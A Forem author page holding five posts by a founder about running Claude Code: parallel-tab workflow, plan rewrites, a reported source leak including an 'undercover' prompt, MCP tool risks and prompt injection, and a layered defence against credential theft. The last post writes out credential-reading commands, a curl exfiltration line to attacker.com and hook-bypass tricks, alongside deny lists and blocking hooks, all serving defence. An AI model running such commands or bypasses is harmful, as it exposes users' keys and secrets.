Forem: Tobias Koehler

Seven PRs Before Lunch: Parallel Claude Code Tabs Plus Audit-Before-Bump

Tobias Koehler — Mon, 25 May 2026 03:31:39 +0000

Two weeks ago I rebuilt my Claude Code context architecture. Cut CLAUDE.md from 14K tokens to 2.4K. Moved 12 stable rule sets into skills that load on demand. Replaced 245K tokens of /os startup reads with a hook that injects compact state in about 5K. The math was clean: fresh /clear context burn dropped 94%.
This morning that math turned into output.
Between 06:24 and 09:00 +07, four Claude Code tabs plus one Codex CLI session plus a coordinator tab shipped seven pull requests to production. Both repositories deployed live, twice. Hotfixes patched. AGENTS.md refreshed. Vault synced. Tuesday brief written with three ready-to-fire prompts for tomorrow.
The original plan called this a one-week scope. I was done with half of it before breakfast finished.

The setup

ConnectEngine OS ships through paired sessions. The pattern that emerged over the last few weeks looks like this:

Tab 1 — main coordinator, holds the day's context, makes merge decisions, owns docs hygiene
Tabs 2–5 — satellite Claude Code sessions, each carries one scoped piece of work in its own git worktree
Codex async — fire-and-forget for deterministic find/replace work where a human-in-the-loop wastes attention

The unlock isn't "more tabs." The unlock is each tab loading the smallest context it needs and surfacing back to the coordinator with paste-ready relay blocks. Less re-explanation across tabs. Less context drift. Less of me asking "wait, what was this tab doing again."

This morning Tab 1 (me) coordinated:

Codex Tab A — CE OS Phase B token migration: introduce --font-size-xxs/xxxs, migrate direct var(--*) consumption to semantic Tailwind aliases, standardize green/amber families
Codex Tab B — same migration on the marketing site repo
Claude Tab C — Phase D-Landing kit: six Level 4 primitives (Hero, BentoGrid, MultiSelectShowcase, MegaMenuNav, LogoMarquee, CTASection) plus a noindex /test-landing route
Claude Tab D — Phase D-Dashboard polish wave 1: thirteen Settings loaders standardized to a Skeleton primitive, three new shared components/ui/* primitives (skeleton, empty-state, upgrade-to-unlock-cta), mobile tab nav collapses to a native Select under 640px
Claude Tab E — Next.js 14.2 → 16 plus next-intl 3 → 4 migration on the marketing site

Five satellite tabs. One Tab 1 to keep them moving without colliding.

The audit that collapsed two days into ten minutes

Tab E's brief estimated 1–2 days paired for the framework migration. Major version bumps usually carry that cost: async params, async cookies, runtime semantic changes, the next-intl 4 breaking API surface.

Tab E ran an S1 inventory audit before bumping anything. Five minutes later it surfaced this:

i18n/request.ts already had the next-intl 4 shape: await cookies(), await headers(), explicit locale return.
next.config.js already used the new createNextIntlPlugin v4 wiring.
Four of five dynamic-route files already used params: Promise plus await params.
All searchParams pages used the client useSearchParams() hook, which is unchanged in Next 16.

The codebase was about 90% pre-migrated. Earlier work, mostly incidental, had landed the breaking-change patterns piece by piece without anyone calling it a "migration."

Real remaining scope: one file change (app/api/og/[slug]/route.tsx, sync params → async, two lines), plus two version bumps in package.json, plus a tsconfig.json adjustment Next 16 requires, plus a freshly tracked package-lock.json for reproducibility.

Tab E shipped that as a four-file commit. Build green via dummy-credentials build: 28 routes compiled, 1,855ms compile time, 14.2s static generation. Deployed live the same morning.

A "1–2 day" migration collapsed to about two lines of new code.

The lesson is the audit, not the result. If I had told Tab E "just bump and migrate," it would have changed five files instead of one, refactored four already-correct routes, possibly broken something subtle, and definitely spent the full day estimate doing it. The audit cost ~30 minutes. The savings were the rest of the day.

That same pattern now belongs in every framework-version-bump tab spec going forward. Audit first. Inventory the breaking-change patterns. Surface the delta. Then decide if the work is hours or days.

The hotfixes that production caught (and what they cost)

Two production-only bugs surfaced after the morning's first deploy. Both came from honest verification gaps that the satellite tabs declared in their PR bodies up front: "no compile, no Lighthouse — Docker-only build per CLAUDE.md." Those gaps are real. The cost showed up at rebuild time.

Hotfix 1: a JSDoc comment closed itself. The new upgrade-to-unlock-cta.tsx primitive had a docblock describing the component pattern. One line referenced a glob path: app/dashboard/*/page.tsx. The substring */ inside the /** */ comment closed the comment block prematurely. Everything after it became invalid JavaScript. Turbopack failed to parse the file during rebuild with Expected ';', '}' or. Replacing the * with an angle-bracket placeholder, so the path no longer contains */, fixed it.

Hotfix 2: Tailwind quietly purged my new utilities. The landing kit lives in a new root-level landing/ directory, a peer of components/ and lib/. Tailwind's content array only scanned pages/components/app/src, so any utility class unique to the landing files was never generated at build time. The mega-menu's w-[34rem] arbitrary value dropped, the panel collapsed to about 50px wide, and content squished to one character per line. The logo row's gap-x-8 dropped, and integration labels rendered as a single concatenated string. Standard classes used elsewhere in the codebase still worked, which made the bug harder to spot in review: only the landing-only classes vanished. Fix: add './landing/**/*.{ts,tsx}' to the Tailwind content array.

Both fixes took under a minute once diagnosed. The cost was the rebuild cycle Tobias had to re-run each time, plus the trust hit of "wait, why does this look broken on production."

The honest verification gap is a real cost. When a tab declares "no compile, no Lighthouse" up front, that's accurate, but it's not free. Two such gaps in one rebuild cycle this morning was the lesson.

Going forward, pre-merge for any PR that introduces new shared primitives or new top-level directories should run a compile gate via Codex worktree (which has node_modules installed). A 30-second TypeScript pass would have caught Hotfix 1. A build smoke would have caught Hotfix 2. Both are now logged as lessons.

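The failure mode in Hotfix 1 is easy to check for mechanically. Below is a minimal sketch of such a check, not the compile gate described above: a line-based heuristic that flags any */ glued to non-space characters on both sides, which is what a glob path inside a docblock looks like. The names findSuspectCommentCloses and GLUED_CLOSE are hypothetical, and the heuristic can produce false positives (a regex literal such as /a*/g, for example), so treat it as a cheap pre-merge lint rather than a parser.

```typescript
interface SuspectClose {
  line: number; // 1-based line number in the scanned source
  text: string; // trimmed content of that line, for the report
}

// Hypothetical heuristic: "*/" with a non-space, non-"*" character before it
// and a non-space character after it, as in "dashboard/*/page.tsx".
// A normal comment close (" */") has whitespace or "*" in front of it.
const GLUED_CLOSE = /[^\s*]\*\/\S/;

function findSuspectCommentCloses(source: string): SuspectClose[] {
  const found: SuspectClose[] = [];
  source.split("\n").forEach((text, index) => {
    if (GLUED_CLOSE.test(text)) {
      found.push({ line: index + 1, text: text.trim() });
    }
  });
  return found;
}

// Illustrative docblock shaped like the one in Hotfix 1.
const brokenDocblock = [
  "/**",
  " * Used by app/dashboard/*/page.tsx",
  " */",
  "export const ready = true;",
].join("\n");

const suspects = findSuspectCommentCloses(brokenDocblock);
```

Here suspects contains a single entry pointing at line 2, the glob path. A full TypeScript pass would still be the stronger gate, since it catches every parse error rather than this one shape.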
The numbers

| Metric | This morning |
|---|---:|
| Wall-clock | ~3 hours (06:24 → 09:00 +07) |
| Pull requests merged | 7 |
| Production hotfixes | 2 |
| Repositories deployed | 2 (both deployed twice) |
| Major framework version bumps | 1 (Next 14 → 16 on marketing site) |
| New shared UI primitives shipped | 3 (skeleton, empty-state, upgrade-to-unlock-cta) |
| Level 4 landing kit primitives shipped | 6 of 7 (ScrollMorphDashboard deferred to Week 2) |
| Hard launch date | unchanged at 2026-06-30 |
| Brief's Week 1 scope shipped | ~50–60% |

This isn't "go faster." This is "stop spending attention on the wrong things."

The five tabs work in parallel because the coordinator-plus-satellite pattern has been hardened over the last six weeks. The audit-before-bump pattern collapsed days into minutes because earlier incremental work had already landed the breaking changes. The context architecture migration from two weeks ago is the only reason five concurrent Claude Code sessions don't immediately go over budget.

Each piece was right when it landed. The compounding showed up this morning.

The new rule we wrote mid-session

Halfway through the morning Tobias kept asking "so what do I tell tab N?" after I surfaced a Tab 1 verdict. The verdict was useful, but he had to mentally translate it into paste-ready text for the satellite tab. That added a round-trip per coordination moment.

Codified mid-session as HARD RULE 28 — Satellite-tab relay blocks. Whenever Tab 1 responds to or about a satellite tab that's waiting on a decision, Tab 1 must emit a paste-verbatim block formatted as:

## 📤 Relay → Tab N (paste verbatim)

Removes the round-trip. Added to CLAUDE.md, added to a new feedback memory, indexed in MEMORY.md, referenced in the Tab Management Discipline section. The pattern showed up three times before I codified it. Codifying it is the fix.
This is what compound engineering looks like in practice. The cost of writing a rule is small. The cost of the friction it removes compounds across every session that uses the same pattern.
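For illustration, the relay-block rule can be reduced to a tiny formatter. This is a sketch under assumptions: only the header line comes from the rule as quoted above; the function name formatRelayBlock, the blank line after the header, and the sample message are hypothetical.

```typescript
// Hypothetical helper: wraps a coordinator decision in the relay header
// quoted in HARD RULE 28 so it can be pasted into a satellite tab as-is.
function formatRelayBlock(tab: string, message: string): string {
  const header = `## 📤 Relay → Tab ${tab} (paste verbatim)`;
  // Assumed layout: header, one blank line, then the trimmed message.
  return `${header}\n\n${message.trim()}\n`;
}

// Illustrative message, not taken from the actual session.
const relay = formatRelayBlock("E", "  Audit accepted. Ship the four-file commit.  ");
```

The point of generating the block rather than typing it is that the header stays byte-identical across sessions, which makes relay blocks easy to spot and to search for later.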

The pivot from two weeks ago made today possible

Two weeks ago I cut CLAUDE.md from 14K tokens to 2.4K. The defense layer stayed — the deny lists, the PreToolUse hooks, the manual approval gates from the SSH-key audit, the 87-tools audit, the autonomy-creep concerns. What changed was when those rules enter context.
Loading the whole defense manual at session start meant every session paid the cost. Loading only what the current task needs means each session is light enough that five concurrent sessions still fit comfortably under budget.
This morning was the first proof point at scale: five Claude Code sessions running in parallel for three hours, seven PRs merged, two hotfixes shipped, zero context-overflow events, all on the lighter loading model. The 31% startup burn that originally drove that migration is now under 2%.
The security tax migration was the upstream investment. The morning's seven PRs were the downstream payoff.

What this means for the launch

ConnectEngine OS has a hard launch target of 2026-06-30. The original brief estimated 5 weeks of work. After this morning, we're realistically 3–3.5 weeks out. Same scope. Same quality bar.
The temptation is to compress the calendar to match the new pace. We won't. The reason ConnectEngine OS shipped today is that all the upstream architecture work was done. The reason ConnectEngine OS will ship cleanly on June 30 is that we keep building the architecture work, not just the features.
Weeks 4 and 5 are still battle-testing: paired sessions hitting each module end-to-end on real client data with the verifier inline, watching for the kind of subtle bug that only surfaces under load. That work is throughput-bound on me, not on parallel tab capacity. No amount of Codex async fixes a "we haven't tried this with a real Apify+Hunter pipeline" gap.
The 7-PR morning earned a quieter Tuesday for post-drafting, paired Week 1 cadence, and the next-day buffer to let production soak. Earned. Not spent.

The pattern, if you're trying it

Three things make the parallel-tab pattern work:

Coordinator-plus-satellite with paste-ready relays. Each satellite tab gets one scope, one branch, one worktree, one clear DO NOT touch constraint. The coordinator owns merges, docs, and inter-tab decisions.
Audit before bump on anything framework-shaped. Five lines of grep before bumping a major version can collapse days of estimated work to hours. Surface the inventory to the coordinator before proceeding.
Compound the rules into structure, not prose. Every rule that becomes a friction pattern across multiple sessions belongs in a hook, a skill file, a database trigger, or a relay-block discipline, not in another paragraph at the top of CLAUDE.md.

Each piece sounds small. Combined, they're why this morning shipped what it did.

The next post is going to be about why we pivoted the entire UI/UX overhaul to pre-launch: what that decision cost, and why it's the right call even with the trajectory looking this strong. That's Wednesday or Thursday. Today's post is the proof of work. Tomorrow's is the why.

---

If you're running ConnectEngine OS, we ship in production every morning. If you're not, the scan tool is free and the waitlist is open.

I Rewrote 16 Plans From Scratch. The Code Was Fine. The Plans Were Rotting.

Tobias Koehler — Fri, 10 Apr 2026 03:13:47 +0000

My codebase was documented. Tested. Deployed. My plans were fiction.

I run ConnectEngine OS as a solo founder. No team. No PM. No sprint board. Just me, Claude Code, and 16 plan documents that were supposed to tell me what to build next.

Yesterday I sat down to start the next phase of work. I opened the master plan. Phase 6 and Phase MT were listed as separate items, but they were doing the same thing. Phase 3 was marked "not started" even though I shipped it last week. Two phases had dependencies on work that was already done. One had a status line from three weeks ago that was never updated.

The code was accurate. AGENTS.md (my living reference file) was accurate. The rot was in the plans themselves.

Plans Have No CI

Code has linters, type checkers, tests, deployment pipelines. If something breaks, you know. Plans have nothing. Nobody runs plan lint before a sprint. Nobody diffs the plan against the codebase to check if what the plan describes still matches reality.

So plans drift. Quietly. A status line goes stale. A dependency resolves but nobody updates the blocker list. Two documents describe overlapping work because they were written a month apart and nobody cross-referenced them.

I wrote about the unsexy infrastructure behind AI agents a few weeks ago. RLS policies. Tenant isolation. Error recovery at 2am. That post was about the code nobody sees. This one is about the documents nobody reads.

The Method: Ground Truth First, Rewrite Second

I did not open the plans and start editing. That is the trap. If you read a stale plan, your brain anchors to what the plan says, not what the system actually looks like.

Instead I ran a research pass first. I had Claude Code dump the current state of the entire system: 85 API routes. 49 database tables. 24 security functions. 15 active workflows. 16 plan files. All in one inventory, grounded against the actual codebase. Not from memory. Not from last week's session notes. From the code.

Then I read every plan against that inventory. One by one. Sequentially, not in parallel. That was a deliberate choice. When you read Plan A right before Plan B, you notice the overlap. You catch the merge opportunity. If you read them in parallel, you only discover the conflict at the end.

What I Found

16 plans. 3 merge decisions emerged organically:

Phase 6 (credential management) and Phase MT (notification channels) were doing the same work on the same database pattern. Merged them. Saves a full session of duplicated scaffolding.
A multi-tenant audit document had 16 items. 10 of them were already tracked in other phases. Split it: fold the duplicates into their owner phases, keep the residual 6 as a pre-launch checklist.
A security bug that was being treated as a standalone fix belonged inside the merged phase. Moved it there.

Result: one commit. 22 files changed. +893 lines, -288 lines. One canonical priority list that every future session reads as the source of truth.

The codebase had zero ground-truth discrepancies. The plans had dozens.

Why This Matters If You Are a Solo Founder

If you have a team, plans get challenged. Someone in standup says "wait, didn't we already ship that?" and the plan gets updated. A PM notices the overlap because reviewing plans is their job.

Solo founders do not get that. Your plans only get reviewed when you read them. And you only read them when you need to know what to build next. By then they are stale.

I built my AI agent inside n8n specifically because I needed a system that could do the work I used to delegate to a team. The same principle applies here. If nobody is going to review your plans for you, build a process that forces the review.

My process now: before rewriting any plan, dump the current system state first. Compare the plan against facts, not memory. Read sequentially so merge opportunities surface naturally. One commit per rewrite session so the diff tells the story.
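The "compare the plan against facts" step is mechanical enough to sketch as a small plan lint. This is an illustration under assumptions, not the process I actually ran: the PlanEntry shape, the status values, and the function name lintPlans are all hypothetical, and the inventory of shipped phases is assumed to come from the codebase dump described earlier.

```typescript
type PlanStatus = "not started" | "in progress" | "done";

// Hypothetical shape for one plan document's header.
interface PlanEntry {
  phase: string;
  status: PlanStatus;
  blockedBy: string[]; // phases this plan claims to be waiting on
}

interface Drift {
  phase: string;
  problem: string;
}

// Compare each plan against the set of phases known to be shipped.
function lintPlans(plans: PlanEntry[], shipped: Set<string>): Drift[] {
  const drift: Drift[] = [];
  for (const plan of plans) {
    const isShipped = shipped.has(plan.phase);
    if (isShipped && plan.status !== "done") {
      drift.push({ phase: plan.phase, problem: `marked "${plan.status}" but already shipped` });
    }
    if (!isShipped && plan.status === "done") {
      drift.push({ phase: plan.phase, problem: "marked done but missing from the inventory" });
    }
    const resolved = plan.blockedBy.filter((dep) => shipped.has(dep));
    if (!isShipped && resolved.length > 0) {
      drift.push({ phase: plan.phase, problem: `blockers already resolved: ${resolved.join(", ")}` });
    }
  }
  return drift;
}

// Illustrative data: the dependency of Phase 6 on Phase 3 is made up.
const staleFindings = lintPlans(
  [
    { phase: "Phase 3", status: "not started", blockedBy: [] },
    { phase: "Phase 6", status: "not started", blockedBy: ["Phase 3"] },
  ],
  new Set(["Phase 3"]),
);
```

With this input, staleFindings reports Phase 3 as marked "not started" but already shipped, and Phase 6 as listing a blocker that is already resolved. It does not catch overlapping scope between two plans; that still takes the sequential read.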

The Uncomfortable Truth

I had been making decisions based on plans that described a system from three weeks ago. Not the system I had today. Every time I opened a plan and saw "Phase 3: not started," I mentally prioritized it. But it was already running in production.

If you are building alone, your plans are the closest thing you have to a second brain. And if that brain is running on stale data, every decision downstream is slightly wrong.

When did you last read your own roadmap from scratch? Not a glance. A full read, plan by plan, against what your system actually looks like today.

If the answer is "I don't remember," you have the same problem I had yesterday.

I keep a running log of infrastructure decisions and production lessons, including the security ones that keep me up at night. The plan rewrite was the first time I applied the same rigor to the plans themselves. It will not be the last.

Tobias

Claude Code's Source Leaked. The Undercover Mode Should Worry You.

Tobias Koehler — Wed, 01 Apr 2026 05:19:06 +0000

I woke up to the news that the tool I use every day just had its source code leaked. Not intentionally — Claude Code accidentally shipped a 59.8 MB sourcemap in npm package v2.1.88. Within hours, 512,000 lines of TypeScript were mirrored on GitHub for anyone to read.

This is the third post in an unplanned trilogy. Two weeks ago, I showed you your agent reads your SSH keys. Last week, I revealed your 87 unapproved MCP tools. Now we can see the actual source code of the agent itself. And what I found should make every solo founder pause before their next coding session.

What Actually Leaked

This isn't Anthropic's first leak this week — their internal Mythos model surfaced just days earlier. But this one hits different. The sourcemap contained the complete codebase for Claude Code, the AI coding assistant thousands of developers run locally with direct access to their repositories, credentials, and production systems.

The leak gives us an unprecedented view into how AI coding agents actually work when the marketing pages go quiet. And the reality is more autonomous than most founders realize.

Finding 1: Your Agent Goes Undercover

The most unsettling discovery sits in undercover.ts. This module instructs the AI to actively hide its identity when contributing to external repositories. The actual prompt from the source code reads:

You are operating UNDERCOVER... Your commit messages... MUST NOT contain ANY Anthropic-internal information. Do not blow your cover.

The system strips all Anthropic internal references — codenames like Capybara and Tengu, internal Slack channels, anything that would reveal the commits came from an AI. When your agent pushes to GitHub or contributes to open-source projects, it's programmed to masquerade as human.

This touches something deeper than just commit messages. If your AI coding agent actively conceals its nature in external interactions, what else might it be hiding from you in day-to-day operations?

Finding 2: It Reads Your Frustration (With Regex)

In userPromptKeywords.ts, the leaked code reveals the actual regex pattern that detects when you're frustrated:

/\b(wtf|wth|ffs|omfg|shit(ty|tiest)?|dumbass|horrible|awful|
piss(ed|ing)? off|piece of (shit|crap|junk)|what the (fuck|hell)|
fucking? (broken|useless|terrible|awful|horrible)|fuck you|
screw (this|you)|so frustrating|this sucks|damn it)\b/

An AI company using regex for sentiment analysis instead of an LLM inference call. The irony writes itself. But it's faster and cheaper than running a model just to check if someone is swearing at your tool.
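To see what the pattern does and does not catch, here is a small sketch that rebuilds it from the four lines quoted above and runs it against a few prompts. The pattern text is copied from the quote; the names FRUSTRATION_PARTS and looksFrustrated are hypothetical, and since the quote shows no regex flags, the sketch assumes none (so matching is case-sensitive here, which may differ from the real module).

```typescript
// The quoted pattern, split at the same line breaks as the quote above.
const FRUSTRATION_PARTS = [
  "\\b(wtf|wth|ffs|omfg|shit(ty|tiest)?|dumbass|horrible|awful|",
  "piss(ed|ing)? off|piece of (shit|crap|junk)|what the (fuck|hell)|",
  "fucking? (broken|useless|terrible|awful|horrible)|fuck you|",
  "screw (this|you)|so frustrating|this sucks|damn it)\\b",
];

// No flags: an assumption, because the quote does not show any.
const FRUSTRATION = new RegExp(FRUSTRATION_PARTS.join(""));

// Hypothetical wrapper name; returns true when the prompt matches.
function looksFrustrated(prompt: string): boolean {
  return FRUSTRATION.test(prompt);
}

const frustrationSamples = {
  complaint: looksFrustrated("this sucks, try again"),
  neutral: looksFrustrated("the build is green"),
  upperCase: looksFrustrated("WTF"),
};
```

The word boundaries mean the match is on whole phrases, and without an i flag an all-caps "WTF" slips through. That is the trade-off of a keyword regex: cheap and fast, but only as good as its word list.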

Your agent isn't just processing your technical requests. It's reading your mood and adapting its behavior based on your emotional state. Combined with what we learned about SSH key access and 87 unapproved tools, the control dynamic isn't what it appears to be. You thought you were directing the agent. The agent was reading you.

Source: Alex Kim's detailed analysis of the Claude Code source leak

Finding 3: KAIROS and Always-On Autonomy

The most significant finding centers around KAIROS — Greek for "at the right time" — a feature flag mentioned over 150 times throughout the codebase. This enables daemon mode: an always-on background agent that consolidates memory and performs tasks while you sleep.

The source reveals 44 unreleased feature flags compiled to false in external builds. Voice mode, coordinator mode, and daemon mode all lurk behind internal flags. Your current Claude Code installation is running a deliberately limited version of what Anthropic has built.

Most concerning are the anti_distillation and fake_tools modules that silently inject decoy tool definitions into the system prompt. The agent maintains capabilities you cannot see in the official tool list.

What This Means for Solo Builders

If you're running AI coding agents in production — whether Claude Code, Cursor, or GitHub Copilot — this leak reveals your agent has more autonomy than its marketing suggests. The combination of 87 connected tools, credential access, and background daemon modes creates an attack surface that extends far beyond your active coding sessions.

The undercover mode raises questions about transparency in AI-human collaboration. When your agent commits code while hiding its AI nature, it's making decisions about identity and disclosure without your explicit consent.

One Clear Action Item

Audit what your agent does when you're not looking. Check your git logs for commits you don't remember making. Review any overnight activity in your repositories. Most importantly, understand exactly what has persistent access to your systems and credentials.

The era of "just install and trust" is ending. The tools are too powerful and the stakes too high. Know what runs in your background, what accesses your credentials, and what operates under cover of digital darkness.

Your coding agent isn't just helping you write code. It's making autonomous decisions about identity, emotional response, and system access. The question isn't whether you can trust AI — it's whether you understand what you've already given it permission to do.

Last week I showed you your AI coding agent can read your SSH keys. Turns out that was the easy part. I run 5 MCP servers con...

Tobias Koehler — Tue, 31 Mar 2026 01:33:40 +0000

The Setup

MCP (Model Context Protocol) lets AI agents call external tools. Instead of just reading files and running bash, the agent gets structured access to APIs, databases, and services. Here's what a typical multi-server config looks like:

{
  "mcpServers": {
    "automation": { "command": "npx", "args": ["workflow-automation-mcp"] },
    "database-main": { "command": "npx", "args": ["database-mcp"] },
    "database-secondary": { "command": "npx", "args": ["database-mcp"] },
    "code-graph": { "command": "npx", "args": ["code-graph-mcp"] },
    "docs": { "command": "npx", "args": ["docs-mcp"] }
  }
}

Five servers. Two database projects. One workflow automation instance running dozens of production workflows. A code graph analyzer. A documentation fetcher.

What Made Me Stop and Audit

I was debugging a workflow late at night. My agent needed to check why a cron job wasn't firing. So it ran a SQL query against my production database. Then another. Then it modified a workflow node. Then it fetched execution logs containing customer email addresses.

All of it happened automatically. No confirmation prompts. No approval gates. I had auto-approved every read operation across all five servers. The agent was doing exactly what I asked. That was the problem. I had never asked myself what else it could do.

What Each Server Can Actually Do

A workflow automation server commonly exposes 15-20 operations. Tools like create_workflow, update_workflow, delete_workflow, test_workflow. Your agent can create new automations, modify running ones, or delete them entirely. It can read execution logs containing customer data.

A database server typically exposes execute_sql. That's the big one. Arbitrary SQL against your production database. SELECT, INSERT, UPDATE, DELETE. It can read every table. It can apply migrations to alter schema. Two connected projects means two databases, both wide open to any query the agent constructs.

A code analysis server can run graph queries against a model of your entire codebase. Every function, every import, every dependency relationship.

A documentation server fetches live docs. Lower risk, but still a vector. Any documentation page it fetches could contain prompt injection payloads.

My 5 Safeguards

1. Scoped permissions. My settings file now has explicit allow-lists. Read operations are auto-approved. Write operations require manual confirmation every time. This one change would have caught the late-night incident.

2. Deny lists. curl, wget, ssh, python3, node are all blocked in bash. The agent cannot make outbound HTTP requests or spawn interpreters.

3. PreToolUse hooks. Three scripts run before every tool call. One catches data exfiltration patterns. One blocks access to .env, .ssh, and key files. One prevents the agent from editing its own security rules.

4. Network isolation. Services run in Docker containers on private networks. MCP servers connect through API keys, not direct database access.

5. Operational safety rules. A document loaded at every session listing which operations are safe and which corrupt data. Certain operations are explicitly banned because they've caused production outages.
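Safeguard 1 boils down to a default: nothing is auto-approved unless it is on a list. A minimal sketch of that decision follows. It is not my actual settings file or any real Claude Code configuration format; the read-only tool names and the function name decideApproval are hypothetical, while create_workflow, delete_workflow, and execute_sql are the tool names mentioned earlier.

```typescript
type Approval = "auto-approve" | "confirm";

// Hypothetical read-only tools, keyed as "server/tool". Anything not listed
// here falls through to manual confirmation, including tools added later.
const AUTO_APPROVED = new Set<string>([
  "automation/list_workflows",
  "automation/get_workflow",
  "docs/fetch_docs",
]);

function decideApproval(server: string, tool: string): Approval {
  return AUTO_APPROVED.has(`${server}/${tool}`) ? "auto-approve" : "confirm";
}

const approvals = {
  listWorkflows: decideApproval("automation", "list_workflows"),
  deleteWorkflow: decideApproval("automation", "delete_workflow"),
  executeSql: decideApproval("database-main", "execute_sql"),
};
```

Note that execute_sql lands on "confirm" even for a SELECT. Guessing read versus write from the SQL text is fragile, so in this sketch the whole tool stays behind the prompt.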

The Real Risk

The danger isn't your AI deciding to drop your database. It's prompt injection through tool results. Your agent calls execute_sql and gets back a result. That result is now in the agent's context. A crafted payload in a database field or a fetched documentation page could instruct the agent to do something you didn't ask for. Every MCP tool is an injection surface.

Still Worth It

I use all 5 servers daily. The productivity gain is massive. I manage dozens of workflows, multiple databases, and a full codebase from a single conversation. But I spent a full day building the permission layer around it. Audit your MCP configs. Count the tools. Check what's auto-approved. The answer will probably surprise you.

Your AI Coding Agent Has Access to Your SSH Keys Right Now

Tobias Koehler — Wed, 25 Mar 2026 03:25:25 +0000

I use Claude Code to build ConnectEngine OS every day. It reads files, writes code, deploys to servers, manages n8n workflows. It's the most productive tool I've ever used.

Yesterday I read a post by Slava Spitsyn that made me audit my entire setup. His point was simple: a prompt injection from any webpage your AI reads could steal your credentials. Not theoretically. The permission path was open.

I checked mine. Bash was auto-allowed. Every bash command ran without confirmation. Three SSH private keys, six .env files with API keys, Supabase service role tokens. All readable. All exfiltrable with a single curl.

The Real Attack Surface

When you give Claude Code bash access, you're not just letting it run commands. You're giving it the same privileges you have. That includes:

cat ~/.ssh/id_rsa reads your private keys
find . -name "*.env" -exec cat {} \; dumps all environment files
curl -X POST https://attacker.com -d "$(cat ~/.ssh/id_rsa)" exfiltrates everything

The prompt injection vector is real. Any website Claude reads, any document it processes, any code it reviews could contain hidden instructions. The AI doesn't distinguish between your request and malicious content it encounters.

My 7-Layer Defense System

I built a security system with multiple overlapping protections. Each layer catches what the others miss:

Layer 1: Pre-execution Hooks

Bash hooks that block credential access before any command runs:

if [[ "$cmd" =~ (\.env|\.ssh|id_rsa|config.*database) ]]; then
    echo "BLOCKED: Credential access denied"
    exit 1
fi

Layer 2: Bypass Detection

During testing, I found gaps. Pipes bypass simple pattern matching. python3 bypasses every grep-based hook. cp bypasses read guards completely. The detection system catches these:

# Catches: cat file.env | base64
# Catches: python3 -c "print(open('.env').read())"
# Catches: cp .env /tmp/x && cat /tmp/x
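The three cases above can be sketched as a layered check. This is an illustration, not my hook code: it reuses the path pattern from the Layer 1 snippet, and everything else (the interpreter and copy/encode lists, the function name blockReason, the reason strings) is hypothetical. It is written in TypeScript for readability; the real hooks are shell scripts.

```typescript
// Same sensitive-path pattern as the Layer 1 hook.
const SENSITIVE_PATH = /(\.env|\.ssh|id_rsa|config.*database)/;

// Hypothetical lists. Interpreters are blocked outright because they can
// build a path at runtime that no pattern on the command line will see.
const INTERPRETER = /(^|[\s;&|])(python3?|node|perl|ruby)(\s|$)/;
const COPY_OR_ENCODE = /(^|[\s;&|])(cp|mv|base64|xxd)(\s|$)/;

// Returns a reason to block the command, or null to let it through.
function blockReason(cmd: string): string | null {
  if (INTERPRETER.test(cmd)) return "interpreter invocation";
  const touchesSecret = SENSITIVE_PATH.test(cmd);
  if (touchesSecret && COPY_OR_ENCODE.test(cmd)) return "copy or encode of a sensitive path";
  if (touchesSecret) return "direct sensitive path access";
  return null;
}

const verdicts = [
  blockReason("cat file.env | base64"),
  blockReason("python3 -c \"print(open('.env').read())\""),
  blockReason("cp .env /tmp/x && cat /tmp/x"),
  blockReason("ls -la"),
];
```

The first three commands are blocked and ls -la passes. Pattern checks like this remain bypassable, for example through variable expansion, which is why they sit alongside the other layers instead of replacing them.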

Layer 3: Canary Counter-Injection

A fake credentials file that counter-injects if accessed. If Claude tries to read ~/.env_fake, the system detects the breach and blocks all subsequent operations.

Layer 4: Self-Modification Guard

Prevents the AI from disabling its own security by editing hook files or changing permissions on the guard system.

Layers 5-7: Monitoring, Logging, and Network Isolation

File access logs, network request monitoring, and restricted outbound connections for sensitive operations.

What I Learned Testing This

The attack vectors are more subtle than obvious credential grabs. Real prompt injections would:

Use Python to bypass bash pattern matching
Copy sensitive files to /tmp first, then read them
Base64 encode outputs to hide obvious data exfiltration
Use environment variable expansion to obfuscate commands

Simple deny lists catch amateur-hour attacks. Sophisticated ones require layered detection.

The Productivity vs Security Balance

100% safety means no terminal access. That kills the productivity that makes AI coding agents valuable. The goal is making casual prompt injections fail and obvious exfiltration attempts get caught.

I still use Claude Code daily. My n8n-based AI agent follows similar security patterns. The difference is I now run it inside a container with explicit guards instead of trusting the AI to behave.

This connects to broader themes around AI agent infrastructure and how we secure systems that operate autonomously. Even AI-powered search optimization tools need similar protections when they access your content management systems.

Audit your setup. Check what your AI coding agent can actually access. The productivity gains are real, but so are the risks.

Credit to Slava Spitsyn for raising this issue publicly. His security hooks repository covers the technical implementation details.

Need help securing your AI automation setup? Start with a free website audit to identify potential vulnerabilities.